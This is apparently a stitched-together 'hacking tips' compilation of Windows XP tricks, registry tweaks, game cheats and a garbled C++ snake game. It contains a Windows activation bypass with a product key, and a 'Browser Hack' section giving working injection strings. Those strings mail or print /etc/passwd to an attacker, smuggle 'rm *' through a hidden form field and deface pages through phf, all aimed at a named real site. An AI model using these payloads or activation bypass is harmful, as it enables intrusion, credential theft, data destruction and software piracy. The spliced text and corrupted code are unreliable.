While most search engines don't rank a website based on the description tag, having the primary keywords appear in the title, description and body content creates a "harmony" that adds validity.

Keyboard light disco

These codes, when executed, make your Caps, Num and Scroll Lock keys flash. Very cool; I have tried it.
1. This piece of code makes your keyboard a live disco:
Set wshShell = WScript.CreateObject("WScript.Shell")
Do
    WScript.Sleep 100
    wshShell.SendKeys "{CAPSLOCK}"
    wshShell.SendKeys "{NUMLOCK}"
    wshShell.SendKeys "{SCROLLLOCK}"
Loop
2. This one makes it look like a chain of lights:
Set wshShell = WScript.CreateObject("WScript.Shell")
Do
    WScript.Sleep 200
    wshShell.SendKeys "{CAPSLOCK}"
    WScript.Sleep 100
    wshShell.SendKeys "{NUMLOCK}"
    WScript.Sleep 50
    wshShell.SendKeys "{SCROLLLOCK}"
Loop
Instructions:
* Paste either of the two codes above into Notepad
* Save as "AnyFileName".vbs
* Run the file
* To stop it, launch Task Manager and, under "Processes", end wscript.exe
Try both scripts; they are different. Enjoy!

Google Talk keyboard shortcuts

Ctrl + E - Centers the selected text, or the current line.
Ctrl + R - Right-justifies the selected text, or the current line.
Ctrl + L - Left-justifies the selected text, or the current line.
Ctrl + I - Same as Tab.
Tab - Moves focus between the windows opened by Google Talk.
Ctrl + Tab - Same as Shift + Tab.
Shift + Tab - Same as Tab, but in reverse.
Ctrl + Shift + L - Switches between bullets, numbers, letters, capital letters, roman numerals and capital roman numerals.
Ctrl + 1 (keypad) - Single line spacing.
Ctrl + 2 (keypad) - Double line spacing.
Ctrl + 5 (keypad) - 1.5 line spacing.
Ctrl + 1 (numpad) - Goes to the end of the last line.
Ctrl + 7 (numpad) - Goes to the beginning of the last line.
Ctrl + F4 - Closes the current window.
Alt + F4 - Closes the current window.
Alt + Esc - Minimizes all windows.
Windows + Esc - Opens Google Talk (if it's minimized, or in the tray).
F9 - Opens Gmail to send an email to the current contact.
F11 - Starts a voice call with your friend.
F12 - Cancels a voice call.
Esc - Closes the current window.

Make a folder INVISIBLE without hiding it
Make your folders invisible :)
1) Right-click on the desktop and make a new folder.
2) Now rename the folder with a blank character: hold the ALT key and type 0160 on the numeric keypad.
3) Now you have a folder without a visible name.
4) Right-click the folder > Properties > Customize. Click Change Icon.
5) Scroll a bit; you should find some empty spaces. Click any one of them and click OK.
That's it; now you can store your personal data without any third-party tools. (The folder is only invisible on screen: dir and Search still list it, so this hides it from casual clicking, not from anyone who looks.)

Make your XP talk

Open a text file in Notepad and write:
' copy from here -------------
Dim msg, sapi
msg = InputBox("Enter your text", "Talk it")
Set sapi = CreateObject("sapi.spvoice")
sapi.Speak msg
' ---------- to here
Save the file with a .vbs extension; this creates a VBScript file. When run, it prompts you for text; enter the text and press OK.

Make Windows genuine

1. Start > Run > regedit (without the quotes, of course)
2. Go to the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents and double-click the OOBETimer value. Change some of the value data to anything else: delete some, add some letters, just change it. Now close regedit.
3. Go to Start > Run > %systemroot%\system32\oobe\msoobe.exe /a (again, don't type the quotes)
4. The activation screen will come up. Click Register over telephone > Next, then click CHANGE PRODUCT KEY, enter this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ and click Update. (Windows will automatically return to the activate-by-telephone mode and ask for an activation code; just ignore it and exit that window. It's done.)
Make XP serial original

Step 1
Open Start/Run..., type regedit and click OK (or press ENTER). Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WPAEvents; on the right, double-click "OOBETimer" and change at least one digit of this value to deactivate Windows. Click OK and close the Registry Editor.

Step 2
Open Start/Run..., type %systemroot%\system32\oobe\msoobe.exe /a and click OK (or press ENTER). This brings up the "Activate Windows" window. Check the option "Yes, I want to telephone a customer service representative to activate Windows" and click Next.

Step 3
Then click "Change Product Key" (don't enter any information on that screen).

Step 4
Type in the new key and click "Update".
The "Activate Windows by phone" window will reappear at this point; just close it by clicking the X in the upper right-hand corner.

Step 5
Reboot your system, open Start/Run..., type %systemroot%\system32\oobe\msoobe.exe /a and click OK (or press ENTER). If you see "Windows is already activated" then everything is OK.

Method to overcome Rapidshare

If you are pissed off by the waiting time on Rapidshare and want to reset the timer to the least wait time, just follow these steps:
!! When you have located the Rapidshare link, copy it (you'll need it later).
!! After Rapidshare shows a long waiting time, say 60 min. or so, just close the browser.
!! Disconnect the network connection which connects you to the net.
!! Reconnect to the internet.
!! Reopen the browser.
!! Paste the link (copied earlier) and voila, the wait time is RESET to the least time, depending on the size of the file you are downloading.
Works for me every time on the Opera 8.5 browser.

POST your replies if it works for you and if any problems are faced. So now you can enjoy Rapidshare without waiting for long hours. Enjoy and thanks.

INFO ABOUT THE SOFTWARE BELOW
Name of software: RapGet (RAPidshareGET) is a Rapidshare auto-downloader, and it supports a lot of free share services.

Advantages of RapGet
* freeware;
* small (about 150 KB);
* auto-downloads from 57 free share services;
* many concurrent downloads;
* multilingual support (37 languages).

Supported services
rapidshare.de megaupload.com sexuploader.com mytempdir.com slil.ru sendspace.com turboupload.com
axifile.com hyperupload.com getfile.biz depositfiles.com webfile.ru file2share.biz rapidupload.com yourfile.org yourfilehost.com filehd.com mooload.com scambia.com filepost.ru justupit.com simpleupload.de audiofind.ru yourfilelink.com files.to savefile.com filebest.ru freefileupload.net 4shared.com ifolder.ru oxyshare.com filecloud.com datenklo.net zshare.net filefactory.com filespace.ru badongo.net easy-sharing.com upload2.net hemenpaylas.com up-file.com rapidshare.fr uploadyourfiles.de quickdump.com megashares.com box.net takdata.com bonpoo.com share.am recfile.com speedyshare.com free-transfer.de paylas.com come2store.com ultrashare.de rapidsafe.de rapidshare.ru
Using this software, you simply paste the link and enjoy the download without typing the download confirmation code and the like.

Multiple login in Google Talk!

Wonder why this feature is not included in Google Talk by default? You can log in simultaneously to more than one account. Unlike multiple login in Yahoo, no registry editing is needed here. Follow these simple steps:
* Create a shortcut to your Google Talk.
* Right-click the shortcut ----> choose Properties.
* In "Target" you will find "C:\Program Files\Google\Google Talk\googletalk.exe"
* Now at the end of the target add /nomutex. It should look like this: "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex
There is a space after googletalk.exe".
That's it. Click OK and you can open more than one Google Talk.

Multiple login in Yahoo Messenger!

This is an old trick, but it's for the new people of this community. Wonderful trick for you, man... enjoy it.
You can log in with multiple IDs on the same Yahoo Messenger. Follow these steps:
* Go to Start ==> Run ==> type regedit, hit Enter
* Go to HKEY_CURRENT_USER ==> Software ==> Yahoo ==> pager ==> Test
* On the right pane, right-click and choose New > DWORD Value.
* Rename it Plural.
* Double-click it and assign a decimal value of 1.
* Now close the registry and restart Yahoo Messenger.
* For signing in with a new ID, open another messenger.
++++++++++++++++++++++++++++++++++++++++++++

Notepad trick

The old chain mail claims Notepad knew about 9/11/2001 and that the flight number which hit the WTC in New York was Q33N. That part is a hoax (neither plane had that flight number), but the font trick itself works. See it yourself:
1. Open Notepad
2. Type: Q33N
3. Now go to the Format menu
4. Choose Font
5. Change the size to '72'
6. Change the font to 'Wingdings'
7. See what is displayed!

Protected folders

To create a protected folder to hide your important files, follow these steps:
1. Open Notepad (Start -> Run -> type notepad)
2. Write: ren a a.{21EC2020-3AEA-1069-A2DD-08002B30309D}
3. Save this file as lock.bat
This method creates a protected folder, where a is the name of the folder. The CLSID is the Control Panel's, so Explorer shows the renamed folder as Control Panel and opens that instead of the folder's contents. The files are still on disk and still listed from the command prompt with dir, so this hides them from casual clicking only.

To remove protection
1. Open Notepad (Start -> Run -> type notepad)
2. Write: ren a.{21EC2020-3AEA-1069-A2DD-08002B30309D} a
3. Save this file as key.bat

Recover the lost administrator's password

Slightly more work is needed if you l

--- mistake: the rest of this replacement body follows below ---
Page 107
Power Of Hacking 4.Just click the administrators user account, and then click Reset Password. 5.You will need to add a new password in the New password and the Confirm new password boxes, and confirm by clicking OK.
All done, you have recovered the lost adminitrators password! renaming computer name Create a Useful Name for My Computer Start/Run/Regedit HKEY_CLASSES_ROOT\CLSID\ {20D04FE0-3AEA-1069-A2D8-08002B30309D}. Data Type: REG_EXPAND_SZ (Expanded String Value). Rename the value named "LocalizedString" to "LocalizedString.old". Create a new REG_EXPAND_SZ value named "LocalizedString", and set the value to "%USERNAME% on %COMPUTERNAME%". Exit the registry editor, click on your desktop and press F5 (for refresh). The "My Computer" icon should now be rename to "Username on Computername". renaming login box Run regedit and go to HKEY_Local_Machine\Software\Microsoft \Windows\CurrentVersion\Winlogon Then add or change the key: LegalNoticeCaption REG_SZ="(Title for Box)" And the same for this key: LegalNoticeText REG_SZ="(Message to be displayed in the box)"
secrets of windows xp Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information.
Secret - Hidden Install Creator Instructions - Go to Start, Run, type iexpress
Secret - Hidden Internet Conference Application Instructions - Go to Start, Run, type conf
Secret - Create a Log File Instructions - Launch Notepad, Type .LOG on the first line, and then press Enter to move to the next line. On the File menu, click Save As, type a descriptive name for your file in the File name Mail:mtahirzahid@yahoo.com
Page 108
Power Of Hacking box, and then click OK. When you next open the file, note that the date and time have been appended to the end of the log, immediately preceding the place where new text can be added. You can use this functionality to automatically add the current date and time to each log entry.
Secret - Image Trails Instructions - Open an image and hold down Shift then drag the image around to create an image trail. Secret - 10x Zoom Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x. Secret - Hidden Font Editor Instructions - Go to Start, Run, type eudcedit
Secret - Hidden Windows Media Player Instructions - Go to Start, Run, type mplayer2 FreeCell Secret - Instant Win Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win. Secret - Hidden Game Modes Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.
Hearts Secret - Show All Cards Instructions - Edit this registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Applets\Hearts and create a new String value named ZB with a Data value of 42. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards.
Minesweeper Secret - Reveal Mines Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel. Secret - Stop Timer Instructions - Launch Minesweeper and start a game so the timer starts counting, then press the Mail:mtahirzahid@yahoo.com
Page 109
Power Of Hacking Windows Key + D to show the desktop. Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.
Pinball Secret - Extra Balls Instructions - Type 1max at the start of a new ball to get extra balls. Secret - Gravity Well Instructions - Type gmax at the start of a new game to activate the Gravity Well. Secret - Instant Promotion Instructions - Type rmax at the start of a new game to go up in ranks. Secret - Skill Shot Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points: First: 15,000 points Second: 30,000 points Third: 75,000 points Fourth: 30,000 points Fifth: 15,000 points Sixth: 7,500 points Secret - Test Mode Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around. While in test mode press the following keys for more secrets: H - Get a 1,000,000,000 High Score M - Shows the amount of system memory R - Increases your rank in game Y - Shows the Frames/sec rate Secret - Unlimited Balls Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.
Solitaire Secret - Instant Win Instructions - Press Alt + Shift + 2 during game play to instantly win. Secret - Draw single cards in a Draw Three game Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three Mail:mtahirzahid@yahoo.com
Page 110
Power Of Hacking cards you will only draw one. Add/Remove Secret - Hidden Uninstall Options Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the "Control Panel", "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.
Control Panel Secret - Hidden Control Panel Extensions Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.
Device Manager Secret - Hidden Devices Instructions - Go to the "Control Panel", "System" icon, "Hardware" tab and select "Device Manager". Select "View" and Show hidden devices. Secret - Phantom Devices Instructions - Go to "Start", "Programs", "Accessories" and select "Command Prompt". At the command prompt, type "set devmgr_show_nonpresent_devices=1" and press Enter. At the command prompt, type "start devmgmt.msc" and press Enter. Select "View" and Show hidden devices. You can see devices that are not connected to the computer. When you close the command prompt window, Windows clears the "devmgr_show_nonpresent_devices=1" variable that you set and prevents phantom devices from being displayed when you select "Show hidden devices".
Music
Secret - Music from the Installer
Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play it.
Shutdown
Secret - Display Hibernate Option on the Shut Down dialog
Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".

Support Tools
Secret - Over 100 Windows XP Support Utilities are on the install CD
Instructions - Run the D:\Support\Tools\setup.exe file.

Short forms for your interesting chat
Looks weird? Maybe for people who do not type much in short forms. Short forms are used increasingly in mobile SMS and other web messaging services. The reason is very obvious: the time factor, message length, reply speed and so on. Here is a list of short forms that are commonly used; it may help you type faster.
AB - Ah Bless!
AFAIK - As Far As I Know
AFK - Away From Keyboard
AKA - Also Known As
AML - All My Love
ASAP - As Soon As Possible
ASL? - Age, Sex, Location?
ATB - All The Best
ATK - At The Keyboard
ATM - At The Moment
A3 - Anytime, Anyplace, Anywhere
BAK - Back At Keyboard
BBL - Be Back Later
BBS - Be Back Soon
BF - Boy Friend
BFN/B4N - Bye For Now
BGWM - Be Gentle With Me
BMW - Be My Wife
BRB - Be Right Back
BRT - Be Right There
BTW - By The Way
B4 - Before
B4N - Bye For Now
CU - See You
CUL8R - See You Later
CYA - See You
D8? - Date?
EOL - End of Lecture
FAQ - Frequently Asked Questions
FC - Fingers Crossed
FOAD - F**k Off And Die
FWIW - For What It's Worth
FYI - For Your Information
F2F - Face to Face
GAL - Get A Life
GF - Girl Friend
G2G - Got to Go
GG - Good Game
GMTA - Great Minds Think Alike
GR8 - Great!
GTH - Go To Hell
G9 - Genius
HAND - Have a Nice Day
HBTU - Happy Birthday To You
HOAS - Hold On A Sec
HUD - How You Doing?
H&K - Hugs and Kisses
IC - I See
ICQ - I Seek you
IDC - I Don't Care
IDK - I Don't Know
ILU - I Love You
IMHO - In My Honest/Humble Opinion
IMO - In My Opinion
IOU - I Owe You
IOW - In Other Words
IRL - In Real Life
JAM - Just A Minute
J4F - Just For Fun
J4K - Just For Kicks
KISS - Keep It Simple, Stupid
LDR - Long Distance Relationship
LMAO - Laugh My *** Off
LOL - Laughing Out Loud
LTNS - Long Time No See
L8R - Later
M8 - Mate
MSG - Message
MTE - My Thoughts Exactly
MYOB - Mind Your Own Business
NE - Any
NE1 - Anyone
NM - NeverMind
NRN - No Reply Necessary
NWO - No Way Out
OIC - Oh I See
OMG - Oh My God
OTOH - On The Other Hand
OTT - Over The Top
PCM - Please Call Me
PITA - Pain In The ***
PML - Piss Myself Laughing
PRT - Party
PRW - Parents Are Watching
PTB - Please Text Back
QT - Cutie
R - Are
RLR - Earlier
ROFL - Rolling On The Floor Laughing
ROFLOL - Rolling On The Floor Laughing Out Loud
ROTFLMAO - Rolling On The Floor Laughing My *** Off
RMB - Ring My Bell
RU - Are You?
RUOK - Are You OK?
SK8 - Skate
SRY - Sorry
STATS - Your Age, Sex, Location?
STFU - Shut The F**k Up!
TB - Text Back
THX - Thank You, Thanks
TMB - Text Me Back
TTFN - TaTa For Now!
TTYL - Talk To You Later
TTTT - To Tell The Truth
U - You
U2 - You Too
U4E - Yours For Ever
UI! - You Idiot!
UR - Your
W@ - What
WB - Welcome Back
****** - What The F**k
WTG - Way To Go!
WTH - What The Hell
WUF - Where Are You From?
W8 - Wait...
10Q - Thank You
7K - Sick

Snake game in c++
//80*48
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned key;
int len=0,count=0,foodtype=0,d,m,food_flag=0,j=0,i=0,display_count=10, hscore_pos=0,x_index=0,y_index=0,mx,my,maze=1,speed=100;
long score=0,ti_elap=0,ti_rem=15,tot_ti=15,ti_init;
char *main_menu[]={{"1. Play"},{"2. Options"},{"3. Instruction"}, {"4. Hi-Score"},{"5. Exit"}};
char *game_menu[]={{"1. Mazes"},{"2. Level"},{"3. Back to Main menu"}};
char *maze_menu[]={{"1. Open"},{"2. Box"},{"3. Twisted"}, {"4. Return to Main menu"}};
char *level_menu[]={{"1. Beginner"},{"2. Intermediate"},{"3. Expert"}, {"4. Return to Main menu"}};
char *m_m[]={"P","O","I","H","E"};
char *g_m[]={"M","L","B"};
char *mm[]={"O","B","T","R"};
char *lm[]={"B","I","E","R"};
int maze3_x[][14]={{2,3,4,5,6,7,8,9,10,11,12,13,14,15}, {25}, {30}, {37,38,39,40,41,42,43,44,45,46,47,48,49,50}};
int maze3_y[][14]={{30}, {2,3,4,5,6,7,8,9,10,11,12,13,14,15}, {27,28,29,30,31,32,33,34,35,36,37,38,39,40}, {20}};
void showfood();
void end();
void show_game_menu();
void show_main_menu();
enum{UP=1,RIGHT=2,DOWN=3,LEFT=4}DIRECTION,Pre_Dir;
struct { unsigned x:7 ; unsigned y:7 ; }coordinate[1000],tail,head,food;
inline void initialise()
{
d=DETECT;
initgraph(&d,&m,"e:\tc\bgi");
cleardevice();
mx=getmaxx();
my=getmaxy();
}
void RESET()
{
len=count=foodtype=food_flag=i=j=hscore_pos=x_index=y_index=0;
display_count=10, speed=100;
score=ti_elap=0;ti_rem=tot_ti=15;
head.x=head.y=tail.x=tail.y=food.x=food.y=0;
for(i=0;i<1000;i++) coordinate[i].x=coordinate[i].y=0;
}
void showoff_food()
{
gotoxy(food.x,food.y);
cout<<" ";
food.x=food.y=0;
showfood();
}
int showfoodtimer(int fo_fl)
{
if(fo_fl==1)
{
if(ti_rem<=0)
{
showoff_food();
ti_rem=15;
food_flag=0;
}
else
{
ti_elap=((biostime(0,0L)-ti_init)/(speed/16));
ti_rem=(tot_ti-(ti_elap));
gotoxy(7,46);
if(ti_rem<10) cout<<"0"<<<<<<<<<<<datebuf<<<>8;
if(s==1) exit();
else if(s==72) //If UP arrow key is pressed
{
if(DIRECTION==4 || DIRECTION==2)
{
Pre_Dir=DIRECTION;
DIRECTION=UP;
}
}
else if(s==80) //If DOWN arrow key is pressed
{
if(DIRECTION==4 || DIRECTION==2)
{
Pre_Dir=DIRECTION;
DIRECTION=DOWN;
}
}
else if(s==77) //If RIGHT arrow key is pressed
{
if(DIRECTION==1 || DIRECTION==3)
{
Pre_Dir=DIRECTION;
DIRECTION=RIGHT;
}
}
else if(s==75) //If LEFT arrow key is pressed
{
if(DIRECTION==1 || DIRECTION==3)
{
Pre_Dir=DIRECTION;
DIRECTION=LEFT;
}
}
}
if(DIRECTION==2) //Right Key
head.x++;
else if(DIRECTION==1) //Up Key
head.y--;
else if(DIRECTION==4) //Left Key
head.x--;
else if(DIRECTION==3) //Down Key
head.y++;
if(maze==1) //OPEN maze
{
if(head.x>50) head.x=2;
else if(head.x<=1) head.x=50;
if(tail.x>50) tail.x=2;
else if(tail.x<=1) tail.x=50;
if(head.y>40) head.y=2;
else if(head.y<=1) head.y=40;
if(tail.y>40) tail.y=2;
else if(tail.y<=1) tail.y=40;
}
else if(maze==2) //BOX Maze
{
if(head.x>50 ||head.y>40 ||head.x<2 ||head.y<2) gameover();
}
else if(maze==3) //TWISTED or SPIRAL Maze
{
for(i=2;i<16;i++)
{
if((head.x==25 && head.y==i)||(head.x==i && head.y==30) ||(head.x==35+i && head.y==20)||(head.x==30 && head.y==25+i))
{
gameover();
}
}
if(head.x>50) head.x=2;
else if(head.x<=1) head.x=50;
if(tail.x>50) tail.x=2;
else if(tail.x<=1) tail.x=50;
if(head.y>40) head.y=2;
else if(head.y<=1) head.y=40;
if(tail.y>40) tail.y=2;
else if(tail.y<=1) tail.y=40;
}
for(int i=0;i5) score+=(foodtype*8)+2+(foodtype*((ti_rem*3)/2));
else score+=(foodtype*8)+2;
ti_rem=15;
SOUND();
food.x=food.y=0;
if(count==5)
{
showbigfood();
food_flag=1;
ti_init=biostime(0,0);
showfoodtimer(1);
foodtype=1;
count=0;
}
else
{
showfood();
food_flag=0;
foodtype=0;
}
len++;
}
else
{
tail.x=coordinate[0].x;
tail.y=coordinate[0].y;
showoff();
for(int k=0;k<<<head.x<< settextstyle(3,0,5);
for(i=0;i<4;i++)
{
setcolor(WHITE);
outtextxy(67,190+(45*i),level_menu[i]);
setcolor(RED);
outtextxy(130,190+(45*i),lm[i]);
}
get_level_choice();
}
void getmaze()
{
cleardevice();
border();
settextstyle(1,0,5);
setcolor(RED);
outtextxy(50,140,"M A Z E S");
settextstyle(3,0,5);
for(i=0;i<4;i++)
{
setcolor(WHITE);
outtextxy(67,190+(45*i),maze_menu[i]);
setcolor(RED);
outtextxy(130,190+(45*i),mm[i]);
}
get_maze_choice();
}
void get_gm_choice()
{
get:
int cho=bioskey(0);
cho=cho>>8;
switch(cho)
{
case 2: case 50: case 28: case 79: getmaze(); break;
case 3: case 38: case 80: getlevel(); break;
case 4: case 48: case 81: show_main_menu(); break;
default: goto get;
}
}
void show_game_menu()
{
cleardevice();
border();
settextstyle(1,0,5);
setcolor(RED);
outtextxy(50,140,"G A M E M E N U");
settextstyle(3,0,5);
for(i=0;i<3;i++)
{
setcolor(WHITE);
outtextxy(67,190+(45*i),game_menu[i]);
setcolor(RED);
outtextxy(130,190+(45*i),g_m[i]);
}
get_gm_choice();
}
void play()
{
cleardevice();
restorecrtmode();
textmode(64);
game();
}
void options()
{
show_game_menu();
}
void instruction()
{
cleardevice();
border();
setcolor(RED);
settextstyle(1,0,5);
outtextxy(50,140,"I N S T R U C T I O N S");
settextstyle(3,0,3);
setcolor(WHITE);
outtextxy(60,190,"1. Move the snake using Arrow Keys -> ");
outtextxy(60,230," UP, DOWN, LEFT, RIGHT");
outtextxy(60,270,"2. Eat food (@,é) and make snake grow longer.");
outtextxy(60,300,"3. You will get 2 points for (@) and");
outtextxy(60,330," more points for Bonus food(é)");
outtextxy(60,365,"4. Don't let it hit the walls or its tail");
settextstyle(4,0,4);
setcolor(RED);
outtextxy(140,425,"Press any key to Continue");
getch();
show_main_menu();
}
void hiscore()
{
cleardevice();
border();
setcolor(RED);
settextstyle(1,0,5);
outtextxy(50,140," H I S C O R E");
settextstyle(3,0,3);
setcolor(WHITE);
outtextxy(60,220,"Sorry! This feature is not available in this version");
outtextxy(60,270,"For further details, Contact : ");
setcolor(GREEN);
outtextxy(60,310," mkj_manishjain@yahoo.co.in");
outtextxy(60,345," Mobile no.: +91 9896455735 ");
settextstyle(4,0,4);
setcolor(RED);
outtextxy(140,425,"Press any key to Continue");
getch();
show_main_menu();
}
void get_mm_choice()
{
get:
int cho=bioskey(0);
cho=cho>>8;
switch(cho)
{
case 2: case 25: case 28: case 79: play(); break;
case 3: case 24:
case 80: options(); break;
case 4: case 23: case 81: instruction(); break;
case 5: case 35: case 75: hiscore(); break;
case 6: case 18: case 76: exit(); break;
default: goto get;
}
}
void show_main_menu()
{
cleardevice();
border();
settextstyle(1,0,5);
setcolor(GREEN);
outtextxy(60,130,"M A I N M E N U");
settextstyle(3,0,5);
for(i=0;i<5;i++)
{
setcolor(WHITE);
outtextxy(67,180+(35*i),main_menu[i]);
setcolor(RED);
outtextxy(130,180+(35*i),m_m[i]);
}
get_mm_choice();
}
void end()
{
initialise();
for(j=0;j<=2;j++)
{
setcolor(RED+j);
circle(mx/2,my/2,150+j*2);
}
settextstyle(4,0,5);
outtextxy(mx/2-65,my/2-20,"The End");
getch();
closegraph();
restorecrtmode();
exit(0);
}
//MAIN FUNCTION
void main()
{
intro_graphics();
show_main_menu();
}
______________________________________________________________________________
Star Wars on PC
You don't need to download it! Just go to Start >> Run, type: telnet towel.blinkenlights.nl, and enjoy the movie!
______________________________________________________________________________
Switch off the web use annoyance
Whenever Windows stumbles across a file type it doesn't recognise you will see a message box that says 'Windows cannot open this file' and gives you the option to 'Use the Web Service' to find the necessary program. I don't know about you but I can't recall a single instance where it has worked, and it's usually much quicker just to Google the file name or extension. Well, thanks to the clever folk at 'howtogeek', here's a way to zap that dialogue box and go straight to the Programs list that you would get if you chose the second option. It works in both XP and Vista and involves editing the Registry, so pay attention, and bear in mind the usual warnings and disclaimers about backing up the Registry first and not messing with it if you don't know what you are doing.
Begin by opening the Registry Editor ('regedit' in Run on the Start menu) and go to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
If there is a key called Explorer, skip the next step; if not, create one by right-clicking Policies, then New > Key, and rename it 'Explorer' (without the quotes). The Explorer key should now be open in the right-hand pane; right-click into it and select New > DWORD Value, rename that to 'NoInternetOpenWith', right-click it, select Modify and change the Value to 1. (Changing the Value to 0, or deleting the key, will reset the hack.) That's it; close Regedit. There's no need for a reboot, so all that remains is to try it out by creating a file with an unrecognised extension and seeing what happens when you try to open it.
Browser Hack
I - Introduction
This file will describe several techniques to acquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benefit from this information.
II - Hacking from your Web Browser
There are several techniques on what I call "Web Browser Hacking". Many beginners don't know that you can't query an etc/passwd file from your browser, and I will describe all the ways to acquire a passwd file. First you need to find a box that is running the cgi-bin/phf file on their system; a great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin and perl.exe or cgi-bin and phf.
a - Finger box hacking: Let's say you wanted to break into somewhere like AOL. The first thing we would do is type in their web site in the URL: http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this: http://www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger; if it is operational you have a chance to receive the etc/passwd file. The next thing you will probably want to do is search for a mailto on the web page; just scan the page for any mailto refs, go back to the finger box and type in this query: nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd. This string takes nobody and emails the passwd file to your email address. If this works you now have the etc/passwd file in your mailbox; you can now run a crack program against it and have a little fun on their box.
b - The common cgi-bin/phf query: This section is for the very beginning hacker. Let's take the same scenario from the first example, except in the URL we would type http://www.aol.com/cgi-bin/phf. If the phf is operational and has not been removed you should get a series of search boxes on the next page (ignore these boxes). To your URL you would add this string: ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this: http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd. This string will print out the etc/passwd file straight to your web browser; all you need to do is save it as a file and again run a crack program against it (this is assuming that they are not :*: or :x:).
c - Don't take my cgi form: This section will explain how to use somebody else's cgi form to obtain the etc/passwd file. Let's say you look at a document source from a web page and find this in the source:
<html><body>
<h2>This is a form to go to Modify</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method="get">
<input type="hidden" name="myaddress" value="nobody@aol.com">
<input type="text" name="input">
<input type="submit" value="send">
</form>
</body></html>
This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line, which assumes the parameters have already been parsed out:
system("/usr/lib/sendmail -t $myaddress < $tempfile")
Now let's set up your page:
<html><body>
<h2>Hack AOL</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get">
<input type="hidden" name="myaddress" value=" ; rm * ;mail -s file youraddress@yourisp.com </etc/passwd;">
<input type = "text" name="input">
<input type = "submit" value="getpasswd">
</form>
</body></html>
The semicolons in the hidden value field act as delimiters; they separate the UNIX commands. This executes commands on the same line: the system call in PERL creates a UNIX shell, and in here mails the passwd file to you.
d - Changing web pages from your browser: This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section, http://www.aol.com; we will then add the following string: cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and shit"%20>>filename.html. This string will allow you to write to filename.html and add "some text and shit". Be aware it has to be in HTML format; you can place text, pictures or whatever you like.
Changing IP Address
1) Getting Your IP Range: Getting information about your IP range is not difficult. I recommend using Neo-Trace on your own IP, but for our test just look at your IP address; say it's 24.193.110.13. You can definitely use the IPs found between 24.193.110.1 < [new ip] < 24.193.110.255; don't use x.x.x.1 or x.x.x.255. To find your IP simply open a DOS/command prompt window, type ipconfig at the prompt, and look for "IP address".
2) Subnet Mask, Default Gateway, DHCP Server: These are very easy to find; just open a DOS/command prompt window and type "ipconfig /all" without the quotes. You should see something like this:
Windows IP Configuration
Host Name . . . . . . . . . . . . : Your Computer Name Here
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xxxx.xx.x
Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003 3:43:16 AM
